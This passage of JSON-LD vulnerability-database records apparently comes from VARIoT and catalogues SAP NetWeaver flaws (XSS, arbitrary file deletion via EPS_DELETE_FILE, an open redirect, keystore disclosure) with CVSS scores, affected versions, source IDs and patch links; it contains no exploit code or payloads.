"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1290"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1290"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=413"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=415"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"trust": 0.4,
"url": "http://dsecrg.com/pages/vul/show.php?id=412"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://www.rsaconference.com/events/2012/usa/index.htm"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=47861"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/47861/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1290"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"db": "BID",
"id": "52101"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "NVD",
"id": "CVE-2012-1290"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"date": "2012-02-21T00:00:00",
"db": "BID",
"id": "52101"
},
{
"date": "2012-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"date": "2012-02-21T06:09:48",
"db": "PACKETSTORM",
"id": "110028"
},
{
"date": "2012-02-23T20:07:25.907000",
"db": "NVD",
"id": "CVE-2012-1290"
},
{
"date": "2012-02-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0825"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0822"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0826"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0827"
},
{
"date": "2012-02-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2012-0823"
},
{
"date": "2012-02-27T20:40:00",
"db": "BID",
"id": "52101"
},
{
"date": "2012-02-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-001570"
},
{
"date": "2012-02-24T05:00:00",
"db": "NVD",
"id": "CVE-2012-1290"
},
{
"date": "2012-02-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of b2b/auction/container.jsp Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-001570"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "110028"
},
{
"db": "CNNVD",
"id": "CNNVD-201202-444"
}
],
"trust": 0.7
}
}
var-201108-0296
Vulnerability from variot
SAP NetWeaver is a service-oriented application and integration platform. Provides a development and runtime environment for SAP applications, as well as custom development and integration with other applications and systems. SAP NetWeaver has any file deletion vulnerability in the implementation of EPS_DELETE_FILE(). This vulnerability can be exploited by remote attackers to delete any file on the affected computer or to steal the hash of the SAP server account in the Windows environment through SMBRelay attack. An attacker can use the default SAP account (such as TMSADM or SAPCPIC) to remotely execute the function EPS_DELETE_FILE to delete any file in the OS, or send a hash of the SAP account to the remote host or perform a smbrelay attack. Attackers can exploit this issue with directory-traversal strings ('../') to delete arbitrary files; this may aid in launching further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201108-0296",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
}
],
"sources": [
{
"db": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5564"
},
{
"db": "BID",
"id": "49321"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexey Sintsov",
"sources": [
{
"db": "BID",
"id": "49321"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2011-5564",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2011-5564",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5564"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is a service-oriented application and integration platform. Provides a development and runtime environment for SAP applications, as well as custom development and integration with other applications and systems. SAP NetWeaver has any file deletion vulnerability in the implementation of EPS_DELETE_FILE(). This vulnerability can be exploited by remote attackers to delete any file on the affected computer or to steal the hash of the SAP server account in the Windows environment through SMBRelay attack. An attacker can use the default SAP account (such as TMSADM or SAPCPIC) to remotely execute the function EPS_DELETE_FILE to delete any file in the OS, or send a hash of the SAP account to the remote host or perform a smbrelay attack. \nAttackers can exploit this issue with directory-traversal strings (\u0027../\u0027) to delete arbitrary files; this may aid in launching further attacks",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5564"
},
{
"db": "BID",
"id": "49321"
},
{
"db": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "49321",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2011-5564",
"trust": 0.8
},
{
"db": "IVD",
"id": "E007BE2C-1F8A-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5564"
},
{
"db": "BID",
"id": "49321"
}
]
},
"id": "VAR-201108-0296",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5564"
}
],
"trust": 1.2925504733333335
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5564"
}
]
},
"last_update_date": "2022-05-17T01:45:32.914000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP Netweaver \\\"EPS_DELETE_FILE()\\\" arbitrary file removal vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/35281"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5564"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/49321/info"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=331"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/1554030"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5564"
},
{
"db": "BID",
"id": "49321"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5564"
},
{
"db": "BID",
"id": "49321"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-26T00:00:00",
"db": "IVD",
"id": "e007be2c-1f8a-11e6-abef-000c29c66e3d"
},
{
"date": "2011-08-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5564"
},
{
"date": "2011-08-22T00:00:00",
"db": "BID",
"id": "49321"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-26T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5564"
},
{
"date": "2011-08-22T00:00:00",
"db": "BID",
"id": "49321"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "49321"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver \\\"EPS_DELETE_FILE()\\\" Arbitrary File Removal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5564"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "49321"
}
],
"trust": 0.3
}
}
var-201311-0407
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP Web Application Server is a web application service program. The input passed to SAP Portal lacks correct validation before being used to redirect users, allowing attackers to build malicious URIs, enticing users to resolve, redirecting user communications to any WEB site, and performing phishing attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0407",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "web application server",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "6.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.x*"
},
{
"model": "web application server",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.x*"
}
],
"sources": [
{
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 2.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "CNVD-2013-14587",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 2.6,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.2,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-14587",
"trust": 0.6,
"value": "LOW"
},
{
"author": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP Web Application Server is a web application service program. The input passed to SAP Portal lacks correct validation before being used to redirect users, allowing attackers to build malicious URIs, enticing users to resolve, redirecting user communications to any WEB site, and performing phishing attacks",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14587"
},
{
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14587",
"trust": 0.8
},
{
"db": "IVD",
"id": "D8AA377E-1EFC-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"id": "VAR-201311-0407",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
],
"trust": 1.1867954900000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"last_update_date": "2022-05-17T02:00:03.211000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for SAP Netweaver Web Application Server J2EE SAP Portal Redirection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/41195"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-13-021-sap-portal-unvalidated-redirect/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-21T00:00:00",
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
},
{
"date": "2013-11-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14587"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Web Application Server J2EE SAP Portal Redirect Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14587"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input validation",
"sources": [
{
"db": "IVD",
"id": "d8aa377e-1efc-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201812-0566
Vulnerability from variot
By default, the SAP NetWeaver AS Java keystore service does not sufficiently restrict the access to resources that should be protected. This has been fixed in SAP NetWeaver AS Java (ServerCore versions 7.11, 7.20, 7.30, 7.31, 7.40, 7.50). SAP NetWeaver is prone to an information disclosure vulnerability. An attacker can exploit this issue to gain sensitive information, that may aid in further attacks. NetWeaver 7.11, 7.20, 7.30, 7.31, 7.40, and 7.50 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201812-0566",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.7,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.7,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
